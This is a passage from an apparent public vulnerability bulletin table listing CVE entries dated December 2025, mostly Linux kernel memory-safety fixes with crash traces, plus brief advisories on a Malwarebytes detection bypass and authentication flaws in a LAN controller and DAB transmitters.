to the actual place where tags are cleared (mte_sync_page_tags()) or restored (mte_restore_tags()). | 2025-12-09 | not yet calculated | CVE-2022-50675 | https://git.kernel.org/stable/c/918002bdbe4328c8c0164a22e8ebf2384b80dc23 https://git.kernel.org/stable/c/749e9fc18b1e1a3f93a9512e91bd7f93002d2821 https://git.kernel.org/stable/c/a8e5e5146ad08d794c58252bab00b261045ef16d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: rds: don't hold sock lock when cancelling work from rds_tcp_reset_callbacks() syzbot is reporting lockdep warning at rds_tcp_reset_callbacks() [1], for commit ac3615e7f3cffe2a ("RDS: TCP: Reduce code duplication in rds_tcp_reset_callbacks()") added cancel_delayed_work_sync() into a section protected by lock_sock() without realizing that rds_send_xmit() might call lock_sock(). We don't need to protect cancel_delayed_work_sync() using lock_sock(), for even if rds_{send,recv}_worker() re-queued this work while __flush_work() from cancel_delayed_work_sync() was waiting for this work to complete, retried rds_{send,recv}_worker() is no-op due to the absence of RDS_CONN_UP bit. | 2025-12-09 | not yet calculated | CVE-2022-50676 | https://git.kernel.org/stable/c/5d2ba255e93211e541373469dffbda7c99dfa0e5 https://git.kernel.org/stable/c/2425007c0967a7c04b0dee7cce05ecf0ca869ad1 https://git.kernel.org/stable/c/e3cb25d3ad08f5dbd53ce2b31720cad529944322 https://git.kernel.org/stable/c/360aa7219285fac63dab99706a16f2daf3222abe https://git.kernel.org/stable/c/da349221c4d2d4ac5f606c1c3b36d4ef0b3e6a0c https://git.kernel.org/stable/c/30bfa5aa7228eb1e67663d67e553627e572cc717 https://git.kernel.org/stable/c/c380c28ab9b15fc53565909c814f6dd3e7f77c4b https://git.kernel.org/stable/c/afe7053c390fe8ff27d0c2ceaece5625283044ba https://git.kernel.org/stable/c/a91b750fd6629354460282bbf5146c01b05c4859 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipmi: fix use after free in _ipmi_destroy_user() The intf_free() function frees the "intf" pointer so we cannot dereference it again on the next line. | 2025-12-09 | not yet calculated | CVE-2022-50677 | https://git.kernel.org/stable/c/35ad87bfe330f7ef6a19f772223c63296d643172 https://git.kernel.org/stable/c/d23006f2a56e11a3103de0ca8b843bf7fd7d76fc https://git.kernel.org/stable/c/f29d127b372e1b7662397d92341d9f7de198ff99 https://git.kernel.org/stable/c/bfce073089cb81482521c65061835aaa6d1a6cc0 https://git.kernel.org/stable/c/f7fde441198a9ecb130c3ccec91ee2131d6998ee https://git.kernel.org/stable/c/1fc9b20a7688000fcf4d7fbaa58e415a3cdda961 https://git.kernel.org/stable/c/a92ce570c81dc0feaeb12a429b4bc65686d17967 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: brcmfmac: fix invalid address access when enabling SCAN log level The variable i is changed when setting random MAC address and causes invalid address access when printing the value of pi->reqs[i]->reqid. We replace reqs index with ri to fix the issue. [ 136.726473] Unable to handle kernel access to user memory outside uaccess routines at virtual address 0000000000000000 [ 136.737365] Mem abort info: [ 136.740172] ESR = 0x96000004 [ 136.743359] Exception class = DABT (current EL), IL = 32 bits [ 136.749294] SET = 0, FnV = 0 [ 136.752481] EA = 0, S1PTW = 0 [ 136.755635] Data abort info: [ 136.758514] ISV = 0, ISS = 0x00000004 [ 136.762487] CM = 0, WnR = 0 [ 136.765522] user pgtable: 4k pages, 48-bit VAs, pgdp = 000000005c4e2577 [ 136.772265] [0000000000000000] pgd=0000000000000000 [ 136.777160] Internal error: Oops: 96000004 [#1] PREEMPT SMP [ 136.782732] Modules linked in: brcmfmac(O) brcmutil(O) cfg80211(O) compat(O) [ 136.789788] Process wificond (pid: 3175, stack limit = 0x00000000053048fb) [ 136.796664] CPU: 3 PID: 3175 Comm: wificond Tainted: G O 4.19.42-00001-g531a5f5 #1 [ 136.805532] Hardware name: Freescale i.MX8MQ EVK (DT) [ 136.810584] pstate: 60400005 (nZCv daif +PAN -UAO) [ 136.815429] pc : brcmf_pno_config_sched_scans+0x6cc/0xa80 [brcmfmac] [ 136.821811] lr : brcmf_pno_config_sched_scans+0x67c/0xa80 [brcmfmac] [ 136.828162] sp : ffff00000e9a3880 [ 136.831475] x29: ffff00000e9a3890 x28: ffff800020543400 [ 136.836786] x27: ffff8000b1008880 x26: ffff0000012bf6a0 [ 136.842098] x25: ffff80002054345c x24: ffff800088d22400 [ 136.847409] x23: ffff0000012bf638 x22: ffff0000012bf6d8 [ 136.852721] x21: ffff8000aced8fc0 x20: ffff8000ac164400 [ 136.858032] x19: ffff00000e9a3946 x18: 0000000000000000 [ 136.863343] x17: 0000000000000000 x16: 0000000000000000 [ 136.868655] x15: ffff0000093f3b37 x14: 0000000000000050 [ 136.873966] x13: 0000000000003135 x12: 0000000000000000 [ 136.879277] x11: 0000000000000000 x10: ffff000009a61888 [ 136.884589] x9 : 000000000000000f x8 : 0000000000000008 [ 136.889900] x7 : 303a32303d726464 x6 : ffff00000a1f957d [ 136.895211] x5 : 0000000000000000 x4 : ffff00000e9a3942 [ 136.900523] x3 : 0000000000000000 x2 : ffff0000012cead8 [ 136.905834] x1 : ffff0000012bf6d8 x0 : 0000000000000000 [ 136.911146] Call trace: [ 136.913623] brcmf_pno_config_sched_scans+0x6cc/0xa80 [brcmfmac] [ 136.919658] brcmf_pno_start_sched_scan+0xa4/0x118 [brcmfmac] [ 136.925430] brcmf_cfg80211_sched_scan_start+0x80/0xe0 [brcmfmac] [ 136.931636] nl80211_start_sched_scan+0x140/0x308 [cfg80211] [ 136.937298] genl_rcv_msg+0x358/0x3f4 [ 136.940960] netlink_rcv_skb+0xb4/0x118 [ 136.944795] genl_rcv+0x34/0x48 [ 136.947935] netlink_unicast+0x264/0x300 [ 136.951856] netlink_sendmsg+0x2e4/0x33c [ 136.955781] __sys_sendto+0x120/0x19c | 2025-12-09 | not yet calculated | CVE-2022-50678 | https://git.kernel.org/stable/c/7ccb0529446ae68a8581916bfc95c353306d76ba https://git.kernel.org/stable/c/1c12d47a9017a7745585b57b9b0fdc0d8c50978e https://git.kernel.org/stable/c/56a0ac48634155d2b866b99fba7e1dd8df4e2804 https://git.kernel.org/stable/c/50e45034c5802cedbf5b707364ea76ace29ad984 https://git.kernel.org/stable/c/75995ce1c926ee87bf93d58977c766b4e7744715 https://git.kernel.org/stable/c/4d4dcfa6b4e85a878401f4fbae4cafc88cdcceb4 https://git.kernel.org/stable/c/826405a911473b6ee8bd2aa891cb2f03a13efa17 https://git.kernel.org/stable/c/aa666b68e73fc06d83c070d96180b9010cf5a960 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: i40e: Fix DMA mappings leak During reallocation of RX buffers, new DMA mappings are created for those buffers. steps for reproduction: while : do for ((i=0; i<=8160; i=i+32)) do ethtool -G enp130s0f0 rx $i tx $i sleep 0.5 ethtool -g enp130s0f0 done done This resulted in crash: i40e 0000:01:00.1: Unable to allocate memory for the Rx descriptor ring, size=65536 Driver BUG WARNING: CPU: 0 PID: 4300 at net/core/xdp.c:141 xdp_rxq_info_unreg+0x43/0x50 Call Trace: i40e_free_rx_resources+0x70/0x80 [i40e] i40e_set_ringparam+0x27c/0x800 [i40e] ethnl_set_rings+0x1b2/0x290 genl_family_rcv_msg_doit.isra.15+0x10f/0x150 genl_family_rcv_msg+0xb3/0x160 ? rings_fill_reply+0x1a0/0x1a0 genl_rcv_msg+0x47/0x90 ? genl_family_rcv_msg+0x160/0x160 netlink_rcv_skb+0x4c/0x120 genl_rcv+0x24/0x40 netlink_unicast+0x196/0x230 netlink_sendmsg+0x204/0x3d0 sock_sendmsg+0x4c/0x50 __sys_sendto+0xee/0x160 ? handle_mm_fault+0xbe/0x1e0 ? syscall_trace_enter+0x1d3/0x2c0 __x64_sys_sendto+0x24/0x30 do_syscall_64+0x5b/0x1a0 entry_SYSCALL_64_after_hwframe+0x65/0xca RIP: 0033:0x7f5eac8b035b Missing register, driver bug WARNING: CPU: 0 PID: 4300 at net/core/xdp.c:119 xdp_rxq_info_unreg_mem_model+0x69/0x140 Call Trace: xdp_rxq_info_unreg+0x1e/0x50 i40e_free_rx_resources+0x70/0x80 [i40e] i40e_set_ringparam+0x27c/0x800 [i40e] ethnl_set_rings+0x1b2/0x290 genl_family_rcv_msg_doit.isra.15+0x10f/0x150 genl_family_rcv_msg+0xb3/0x160 ? rings_fill_reply+0x1a0/0x1a0 genl_rcv_msg+0x47/0x90 ? genl_family_rcv_msg+0x160/0x160 netlink_rcv_skb+0x4c/0x120 genl_rcv+0x24/0x40 netlink_unicast+0x196/0x230 netlink_sendmsg+0x204/0x3d0 sock_sendmsg+0x4c/0x50 __sys_sendto+0xee/0x160 ? handle_mm_fault+0xbe/0x1e0 ? syscall_trace_enter+0x1d3/0x2c0 __x64_sys_sendto+0x24/0x30 do_syscall_64+0x5b/0x1a0 entry_SYSCALL_64_after_hwframe+0x65/0xca RIP: 0033:0x7f5eac8b035b This was caused because of new buffers with different RX ring count should substitute older ones, but those buffers were freed in i40e_configure_rx_ring and reallocated again with i40e_alloc_rx_bi, thus kfree on rx_bi caused leak of already mapped DMA. Fix this by reallocating ZC with rx_bi_zc struct when BPF program loads. Additionally reallocate back to rx_bi when BPF program unloads. If BPF program is loaded/unloaded and XSK pools are created, reallocate RX queues accordingly in XSP_SETUP_XSK_POOL handler. | 2025-12-09 | not yet calculated | CVE-2022-50679 | https://git.kernel.org/stable/c/ed5baf3d0a33caaca4cd4073ebb0854cc77a616d https://git.kernel.org/stable/c/94a171c982b8a8137a00721c1e62bc2713435bca https://git.kernel.org/stable/c/5f499596dfa3db9b3172645b6de9e1096a669c95 https://git.kernel.org/stable/c/aae425efdfd1b1d8452260a3cb49344ebf20b1f5 |
| n/a--Malwarebytes 1.0.14 | Malwarebytes 1.0.14 for Linux doesn't properly compute signatures in some scenarios. This allows a bypass of detection. | 2025-12-12 | not yet calculated | CVE-2023-29144 | https://malwarebytes.com https://www.malwarebytes.com/secure/cves/cve-2023-29144 |
| Tinycontrol--Tinycontrol LAN Controller v | Tinycontrol LAN Controller v3 LK3 version 1.58a contains an unauthenticated vulnerability that allows remote attackers to download configuration backup files containing sensitive credentials. Attackers can retrieve the lk3_settings.bin file and extract base64-encoded user and admin passwords without authentication. | 2025-12-09 | not yet calculated | CVE-2023-53739 | ExploitDB-51731 Tinycontrol Product Homepage Zero Science Lab Advisory ID VulnCheck Advisory: Tinycontrol LAN Controller v3 LK3 1.58a Unauthenticated Configuration Backup Disclosure |
| DB Elettronica Telecomunicazioni SpA--Screen SFT DAB Series - Compact Radio DAB Transmitter | Screen SFT DAB 1.9.3 contains an authentication bypass vulnerability that allows attackers to change the admin password without providing the current credentials. Attackers can exploit the userManager.cgx endpoint by sending a crafted JSON request with a new MD5-hashed password to directly modify the admin account. | 2025-12-10 | not yet calculated | CVE-2023-53740 | ExploitDB-51458 Product Homepage Official Product Homepage Vendor Homepage Advisory URL VulnCheck Advisory: Screen SFT DAB 1.9.3 Authentication Bypass via Admin Password Change |
| DB Elettronica Telecomunicazioni SpA--Screen SFT DAB Series - Compact Radio DAB Transmitter | Screen SFT DAB 1.9.3 contains a weak session management vulnerability that allows attackers to bypass authentication controls by reusing IP address-bound session identifiers. Attackers can exploit the vulnerable API by intercepting and reusing established sessions to remove user accounts without proper authorization. | 2025-12-10 | not yet calculated | CVE-2023-53741 | ExploitDB-51457 Product Homepage Official Product Homepage Vendor Homepage Vendor Security Advisory for ZSL-2023-5773 VulnCheck Advisory: Screen SFT DAB 1.9.3 Authentication Bypass via IP Session Management |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: kcsan: Avoid READ_ONCE() in read_instrumented_memory() Haibo Li reported: | Unable to handle kernel paging request at virtual address | ffffff802a0d8d7171 | Mem abort info:o: | ESR = 0x9600002121 | EC = 0x25: DABT (current EL), IL = 32 bitsts | SET = 0, FnV = 0 0 | EA = 0, S1PTW = 0 0 | FSC = 0x21: alignment fault | Data abort info:o: | ISV = 0, ISS = 0x0000002121 | CM = 0, WnR = 0 0 | swapper pgtable: 4k pages, 39-bit VAs, pgdp=000000002835200000 | [ffffff802a0d8d71] pgd=180000005fbf9003, p4d=180000005fbf9003, | pud=180000005fbf9003, pmd=180000005fbe8003, pte=006800002a0d8707 | Internal error: Oops: 96000021 [#1] PREEMPT SMP | Modules linked in: | CPU: 2 PID: 45 Comm: kworker/u8:2 Not tainted | 5.15.78-android13-8-g63561175bbda-dirty #1 | ... | pc : kcsan_setup_watchpoint+0x26c/0x6bc | lr : kcsan_setup_watchpoint+0x88/0x6bc | sp : ffffffc00ab4b7f0 | x29: ffffffc00ab4b800 x28: ffffff80294fe588 x27: 0000000000000001 | x26: 0000000000000019 x25: 0000000000000001 x24: ffffff80294fdb80 | x23: 0000000000000000 x22: ffffffc00a70fb68 x21: ffffff802a0d8d71 | x20: 0000000000000002 x19: 0000000000000000 x18: ffffffc00a9bd060 | x17: 0000000000000001 x16: 0000000000000000 x15: ffffffc00a59f000 | x14: 0000000000000001 x13: 0000000000000000 x12: ffffffc00a70faa0 | x11: 00000000aaaaaaab x10: 0000000000000054 x9 : ffffffc00839adf8 | x8 : ffffffc009b4cf00 x7 : 0000000000000000 x6 : 0000000000000007 | x5 : 0000000000000000 x4 : 0000000000000000 x3 : ffffffc00a70fb70 | x2 : 0005ff802a0d8d71 x1 : 0000000000000000 x0 : 0000000000000000 | Call trace: | kcsan_setup_watchpoint+0x26c/0x6bc | __tsan_read2+0x1f0/0x234 | inflate_fast+0x498/0x750 | zlib_inflate+0x1304/0x2384 | __gunzip+0x3a0/0x45c | gunzip+0x20/0x30 | unpack_to_rootfs+0x2a8/0x3fc | do_populate_rootfs+0xe8/0x11c | async_run_entry_fn+0x58/0x1bc | process_one_work+0x3ec/0x738 | worker_thread+0x4c4/0x838 | kthread+0x20c/0x258 | ret_from_fork+0x10/0x20 | Code: b8bfc2a8 2a0803f7 14000007 d503249f (78bfc2a8) ) | ---[ end trace 613a943cb0a572b6 ]----- The reason for this is that on certain arm64 configuration since e35123d83ee3 ("arm64: lto: Strengthen READ_ONCE() to acquire when CONFIG_LTO=y"), READ_ONCE() may be promoted to a full atomic acquire instruction which cannot be used on unaligned addresses. Fix it by avoiding READ_ONCE() in read_instrumented_memory(), and simply forcing the compiler to do the required access by casting to the appropriate volatile type. In terms of generated code this currently only affects architectures that do not use the default READ_ONCE() implementation. The only downside is that we are not guaranteed atomicity of the access itself, although on most architectures a plain load up to machine word size should still be atomic (a fact the default READ_ONCE() still relies on itself). | 2025-12-08 | not yet calculated | CVE-2023-53742 | https://git.kernel.org/stable/c/706ae665747b629bcf87a2d7e6438602f904b8d5 https://git.kernel.org/stable/c/75c03a8cfc731519236f08c34c7e029ae153a613 https://git.kernel.org/stable/c/f8f2297355513e5e0631e604ef9d7e449c7dcd00 https://git.kernel.org/stable/c/8dec88070d964bfeb4198f34cb5956d89dd1f557 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: PCI: Free released resource after coalescing release_resource() doesn't actually free the resource or resource list entry so free the resource list entry to avoid a leak. | 2025-12-08 | not yet calculated | CVE-2023-53743 | https://git.kernel.org/stable/c/4443f3695d581ad1a55f2ef59259dcd0c52402b3 https://git.kernel.org/stable/c/a076e73dd6e619729e1af8d0d802fe52ac5eb2b3 https://git.kernel.org/stable/c/a08713b9d9031683b83b3ecf12bad40a1ca35211 https://git.kernel.org/stable/c/8ec9c1d5d0a5a4744516adb483b97a238892f9d5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: soc: ti: pm33xx: Fix refcount leak in am33xx_pm_probe wkup_m3_ipc_get() takes refcount, which should be freed by wkup_m3_ipc_put(). Add missing refcount release in the error paths. | 2025-12-08 | not yet calculated | CVE-2023-53744 | https://git.kernel.org/stable/c/08310f810975c8c9e17c6ffb99fdb76a84e8adb7 https://git.kernel.org/stable/c/6a50350033e0e0854acf59a8413913b4de04bd7d https://git.kernel.org/stable/c/6dbcc493a18dd60947c2168a39df0ec2fe7b5110 https://git.kernel.org/stable/c/e6c6b40c9bf49ce9b5493b146bfeb96359937cfa https://git.kernel.org/stable/c/65305e8c0009a1933679dad5c8196060a10f3c8b https://git.kernel.org/stable/c/8f3c307b580a4a6425896007325bddefc36e8d91 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: um: vector: Fix memory leak in vector_config If the return value of the uml_parse_vector_ifspec function is NULL, we should call kfree(params) to prevent memory leak. | 2025-12-08 | not yet calculated | CVE-2023-53745 | https://git.kernel.org/stable/c/5c49fb5ad01104acc584405572abf6616d45148e https://git.kernel.org/stable/c/6480c3a12755bf85d6738ab60967e89b809c701a https://git.kernel.org/stable/c/f2b9c4544e3bd60f353732291300097b0e8d8454 https://git.kernel.org/stable/c/276a7298af6a801e9a865282605a79303365ec66 https://git.kernel.org/stable/c/c8583b4655aab44a9796b5c4a681ddcc6fe2f0d0 https://git.kernel.org/stable/c/634a9c139cc1362f6a9cc6cbfe442dbb60ff9f3f https://git.kernel.org/stable/c/8f88c73afe481f93d40801596927e8c0047b6d96 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: s390/vfio-ap: fix memory leak in vfio_ap device driver The device release callback function invoked to release the matrix device uses the dev_get_drvdata(device *dev) function to retrieve the pointer to the vfio_matrix_dev object in order to free its storage. The problem is, this object is not stored as drvdata with the device; since the kfree function will accept a NULL pointer, the memory for the vfio_matrix_dev object is never freed. Since the device being released is contained within the vfio_matrix_dev object, the container_of macro will be used to retrieve its pointer. | 2025-12-08 | not yet calculated | CVE-2023-53746 | https://git.kernel.org/stable/c/5195de1d5f66b276683240a896783f7f43c4f664 https://git.kernel.org/stable/c/ee17dea3072dec0bc34399a32fa884e26342e4ea https://git.kernel.org/stable/c/aa2bff25e9bb10c935c7ffe3d5f5975bdccb1749 https://git.kernel.org/stable/c/6a40fda14b4be3e38f03cc42ffd4efbc64fb3e67 https://git.kernel.org/stable/c/7b6a02f5bf15931464c79dfd487c57f76aae3496 https://git.kernel.org/stable/c/8f8cf767589f2131ae5d40f3758429095c701c84 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: vc_screen: reload load of struct vc_data pointer in vcs_write() to avoid UAF After a call to console_unlock() in vcs_write() the vc_data struct can be freed by vc_port_destruct(). Because of that, the struct vc_data pointer must be reloaded in the while loop in vcs_write() after console_lock() to avoid a UAF when vcs_size() is called. Syzkaller reported a UAF in vcs_size(). BUG: KASAN: slab-use-after-free in vcs_size (drivers/tty/vt/vc_screen.c:215) Read of size 4 at addr ffff8880beab89a8 by task repro_vcs_size/4119 Call Trace: <TASK> __asan_report_load4_noabort (mm/kasan/report_generic.c:380) vcs_size (drivers/tty/vt/vc_screen.c:215) vcs_write (drivers/tty/vt/vc_screen.c:664) vfs_write (fs/read_write.c:582 fs/read_write.c:564) ... <TASK> Allocated by task 1213: kmalloc_trace (mm/slab_common.c:1064) vc_allocate (./include/linux/slab.h:559 ./include/linux/slab.h:680 drivers/tty/vt/vt.c:1078 drivers/tty/vt/vt.c:1058) con_install (drivers/tty/vt/vt.c:3334) tty_init_dev (drivers/tty/tty_io.c:1303 drivers/tty/tty_io.c:1415 drivers/tty/tty_io.c:1392) tty_open (drivers/tty/tty_io.c:2082 drivers/tty/tty_io.c:2128) chrdev_open (fs/char_dev.c:415) do_dentry_open (fs/open.c:921) vfs_open (fs/open.c:1052) ... Freed by task 4116: kfree (mm/slab_common.c:1016) vc_port_destruct (drivers/tty/vt/vt.c:1044) tty_port_destructor (drivers/tty/tty_port.c:296) tty_port_put (drivers/tty/tty_port.c:312) vt_disallocate_all (drivers/tty/vt/vt_ioctl.c:662 (discriminator 2)) vt_ioctl (drivers/tty/vt/vt_ioctl.c:903) tty_ioctl (drivers/tty/tty_io.c:2778) ... The buggy address belongs to the object at ffff8880beab8800 which belongs to the cache kmalloc-1k of size 1024 The buggy address is located 424 bytes inside of freed 1024-byte region [ffff8880beab8800, ffff8880beab8c00) The buggy address belongs to the physical page: page:00000000afc77580 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0xbeab8 head:00000000afc77580 order:3 entire_mapcount:0 nr_pages_mapped:0 pincount:0 flags: 0xfffffc0010200(slab|head|node=0|zone=1|lastcpupid=0x1fffff) page_type: 0xffffffff() raw: 000fffffc0010200 ffff888100042dc0 ffffea000426de00 dead000000000002 raw: 0000000000000000 0000000000100010 00000001ffffffff 0000000000000000 page dumped because: kasan: bad access detected Memory state around the buggy address: ffff8880beab8880: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb ffff8880beab8900: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb >ffff8880beab8980: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb ^ ffff8880beab8a00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb ffff8880beab8a80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb ================================================================== Disabling lock debugging due to kernel taint | 2025-12-08 | not yet calculated | CVE-2023-53747 | https://git.kernel.org/stable/c/934de9a9b659785fed3e820bc0c813a460c71fea https://git.kernel.org/stable/c/0deff678157333d775af190f84696336cdcccd6d https://git.kernel.org/stable/c/a4e3c4c65ae8510e01352c9a4347e05c035b2ce2 https://git.kernel.org/stable/c/11dddfbb7a4e62489b01074d6c04d9d1b42e4047 https://git.kernel.org/stable/c/e3d1adcad5b73c7ed0c7edb35ab68abcaa45cf67 https://git.kernel.org/stable/c/3338d0b9acde770ee588eead5cac32c25e7048fc https://git.kernel.org/stable/c/1de42e7653d6714a7507ba6696151a1fa028c69f https://git.kernel.org/stable/c/8fb9ea65c9d1338b0d2bb0a9122dc942cdd32357 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: mediatek: vcodec: Fix potential array out-of-bounds in decoder queue_setup variable *nplanes is provided by user via system call argument. The possible value of q_data->fmt->num_planes is 1-3, while the value of *nplanes can be 1-8. The array access by index i can cause array out-of-bounds. Fix this bug by checking *nplanes against the array size. | 2025-12-08 | not yet calculated | CVE-2023-53748 | https://git.kernel.org/stable/c/48e4e06e2c5fe1fda283d499f91492eda2248bb9 https://git.kernel.org/stable/c/b8e19bf3b4aebd855be01b64674187dcf6d1db51 https://git.kernel.org/stable/c/8fbcf730cb89c3647f3365226fe7014118fa93c7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: x86: fix clear_user_rep_good() exception handling annotation This code no longer exists in mainline, because it was removed in commit d2c95f9d6802 ("x86: don't use REP_GOOD or ERMS for user memory clearing") upstream. However, rather than backport the full range of x86 memory clearing and copying cleanups, fix the exception table annotation placement for the final 'rep movsb' in clear_user_rep_good(): rather than pointing at the actual instruction that did the user space access, it pointed to the register move just before it. That made sense from a code flow standpoint, but not from an actual usage standpoint: it means that if user access takes an exception, the exception handler won't actually find the instruction in the exception tables. As a result, rather than fixing it up and returning -EFAULT, it would then turn it into a kernel oops report instead, something like: BUG: unable to handle page fault for address: 0000000020081000 #PF: supervisor write access in kernel mode #PF: error_code(0x0002) - not-present page ... RIP: 0010:clear_user_rep_good+0x1c/0x30 arch/x86/lib/clear_page_64.S:147 ... Call Trace: __clear_user arch/x86/include/asm/uaccess_64.h:103 [inline] clear_user arch/x86/include/asm/uaccess_64.h:124 [inline] iov_iter_zero+0x709/0x1290 lib/iov_iter.c:800 iomap_dio_hole_iter fs/iomap/direct-io.c:389 [inline] iomap_dio_iter fs/iomap/direct-io.c:440 [inline] __iomap_dio_rw+0xe3d/0x1cd0 fs/iomap/direct-io.c:601 iomap_dio_rw+0x40/0xa0 fs/iomap/direct-io.c:689 ext4_dio_read_iter fs/ext4/file.c:94 [inline] ext4_file_read_iter+0x4be/0x690 fs/ext4/file.c:145 call_read_iter include/linux/fs.h:2183 [inline] do_iter_readv_writev+0x2e0/0x3b0 fs/read_write.c:733 do_iter_read+0x2f2/0x750 fs/read_write.c:796 vfs_readv+0xe5/0x150 fs/read_write.c:916 do_preadv+0x1b6/0x270 fs/read_write.c:1008 __do_sys_preadv2 fs/read_write.c:1070 [inline] __se_sys_preadv2 fs/read_write.c:1061 [inline] __x64_sys_preadv2+0xef/0x150 fs/read_write.c:1061 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x39/0xb0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd which then looks like a filesystem bug rather than the incorrect exception annotation that it is. [ The alternative to this one-liner fix is to take the upstream series that cleans this all up: 68674f94ffc9 ("x86: don't use REP_GOOD or ERMS for small memory copies") 20f3337d350c ("x86: don't use REP_GOOD or ERMS for small memory clearing") adfcf4231b8c ("x86: don't use REP_GOOD or ERMS for user memory copies") * d2c95f9d6802 ("x86: don't use REP_GOOD or ERMS for user memory clearing") 3639a535587d ("x86: move stac/clac from user copy routines into callers") 577e6a7fd50d ("x86: inline the 'rep movs' in user copies for the FSRM case") 8c9b6a88b7e2 ("x86: improve on the non-rep 'clear_user' function") 427fda2c8a49 ("x86: improve on the non-rep 'copy_user' function") * e046fe5a36a9 ("x86: set FSRS automatically on AMD CPUs that have FSRM") e1f2750edc4a ("x86: remove 'zerorest' argument from __copy_user_nocache()") 034ff37d3407 ("x86: rewrite '__copy_user_nocache' function") with either the whole series or at a minimum the two marked commits being needed to fix this issue ] | 2025-12-08 | not yet calculated | CVE-2023-53749 | https://git.kernel.org/stable/c/90510aed20a26e1a4dede4ef6b640e6a4122f38f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: pinctrl: freescale: Fix a memory out of bounds when num_configs is 1 The config passed in by pad wakeup is 1, when num_configs is 1, Configuration [1] should not be fetched, which will be detected by KASAN as a memory out of bounds condition. Modify to get configs[1] when num_configs is 2. | 2025-12-08 | not yet calculated | CVE-2023-53750 | https://git.kernel.org/stable/c/f85d3cb10f4df5ae3bdb9a9357315c28d781651f https://git.kernel.org/stable/c/27d9a7585b594bb2f9bb1f65e0003814fcc69c75 https://git.kernel.org/stable/c/9063777ca1e2e895c5fdd493ee0c3f18fa710ed4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: cifs: fix potential use-after-free bugs in TCP_Server_Info::hostname TCP_Server_Info::hostname may be updated once or many times during reconnect, so protect its access outside reconnect path as well and then prevent any potential use-after-free bugs. | 2025-12-08 | not yet calculated | CVE-2023-53751 | https://git.kernel.org/stable/c/64d62ac6d6514cba1305bd08e271ec1843bdd612 https://git.kernel.org/stable/c/c511954bf142fe1995aec3c739a9f1a76990283a https://git.kernel.org/stable/c/0b08c4c499200be67d54c439d56e5ea866869945 https://git.kernel.org/stable/c/90c49fce1c43e1cc152695e20363ff5087897c09 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: deal with integer overflows in kmalloc_reserve() Blamed commit changed: ptr = kmalloc(size); if (ptr) size = ksize(ptr); size = kmalloc_size_roundup(size); ptr = kmalloc(size); This allowed various crash as reported by syzbot [1] and Kyle Zeng. Problem is that if @size is bigger than 0x80000001, kmalloc_size_roundup(size) returns 2^32. kmalloc_reserve() uses a 32bit variable (obj_size), so 2^32 is truncated to 0. kmalloc(0) returns ZERO_SIZE_PTR which is not handled by skb allocations. Following trace can be triggered if a netdev->mtu is set close to 0x7fffffff We might in the future limit netdev->mtu to more sensible limit (like KMALLOC_MAX_SIZE). This patch is based on a syzbot report, and also a report and tentative fix from Kyle Zeng. [1] BUG: KASAN: user-memory-access in __build_skb_around net/core/skbuff.c:294 [inline] BUG: KASAN: user-memory-access in __alloc_skb+0x3c4/0x6e8 net/core/skbuff.c:527 Write of size 32 at addr 00000000fffffd10 by task syz-executor.4/22554 CPU: 1 PID: 22554 Comm: syz-executor.4 Not tainted 6.1.39-syzkaller #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/03/2023 Call trace: dump_backtrace+0x1c8/0x1f4 arch/arm64/kernel/stacktrace.c:279 show_stack+0x2c/0x3c arch/arm64/kernel/stacktrace.c:286 __dump_stack lib/dump_stack.c:88 [inline] dump_stack_lvl+0x120/0x1a0 lib/dump_stack.c:106 print_report+0xe4/0x4b4 mm/kasan/report.c:398 kasan_report+0x150/0x1ac mm/kasan/report.c:495 kasan_check_range+0x264/0x2a4 mm/kasan/generic.c:189 memset+0x40/0x70 mm/kasan/shadow.c:44 __build_skb_around net/core/skbuff.c:294 [inline] __alloc_skb+0x3c4/0x6e8 net/core/skbuff.c:527 alloc_skb include/linux/skbuff.h:1316 [inline] igmpv3_newpack+0x104/0x1088 net/ipv4/igmp.c:359 add_grec+0x81c/0x1124 net/ipv4/igmp.c:534 igmpv3_send_cr net/ipv4/igmp.c:667 [inline] igmp_ifc_timer_expire+0x1b0/0x1008 net/ipv4/igmp.c:810 call_timer_fn+0x1c0/0x9f0 kernel/time/timer.c:1474 expire_timers kernel/time/timer.c:1519 [inline] __run_timers+0x54c/0x710 kernel/time/timer.c:1790 run_timer_softirq+0x28/0x4c kernel/time/timer.c:1803 _stext+0x380/0xfbc ____do_softirq+0x14/0x20 arch/arm64/kernel/irq.c:79 call_on_irq_stack+0x24/0x4c arch/arm64/kernel/entry.S:891 do_softirq_own_stack+0x20/0x2c arch/arm64/kernel/irq.c:84 invoke_softirq kernel/softirq.c:437 [inline] __irq_exit_rcu+0x1c0/0x4cc kernel/softirq.c:683 irq_exit_rcu+0x14/0x78 kernel/softirq.c:695 el0_interrupt+0x7c/0x2e0 arch/arm64/kernel/entry-common.c:717 __el0_irq_handler_common+0x18/0x24 arch/arm64/kernel/entry-common.c:724 el0t_64_irq_handler+0x10/0x1c arch/arm64/kernel/entry-common.c:729 el0t_64_irq+0x1a0/0x1a4 arch/arm64/kernel/entry.S:584 | 2025-12-08 | not yet calculated | CVE-2023-53752 | 